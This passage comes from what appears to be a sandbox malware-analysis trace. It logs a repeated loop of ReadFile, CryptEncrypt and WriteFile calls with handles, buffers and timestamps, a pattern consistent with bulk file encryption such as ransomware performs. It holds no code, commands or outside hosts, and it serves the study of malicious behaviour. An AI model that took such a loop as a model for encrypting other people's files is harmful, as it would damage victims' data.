dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.349] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.349] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.349] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.349] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.349] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.349] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.349] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.349] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.349] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.349] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.349] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.350] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.350] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.350] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.350] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.350] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.350] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.350] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.350] GetLastError () returned 0x0 [0155.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.351] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.351] GetLastError () returned 0x0 [0155.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.351] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.351] GetLastError () returned 0x0 [0155.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.351] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.351] GetLastError () returned 0x0 [0155.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.351] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.351] GetLastError () returned 0x0 [0155.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.351] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.351] GetLastError () returned 0x0 [0155.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.351] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.351] GetLastError () returned 0x0 [0155.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.351] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.352] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.352] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.352] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.352] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.352] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.352] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.352] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.352] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.353] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.353] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.353] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.353] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.353] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.353] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.353] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.353] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.353] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.353] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.353] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.353] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.353] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.353] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.353] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.353] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.353] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.353] GetLastError () returned 0x0 [0155.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.354] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, 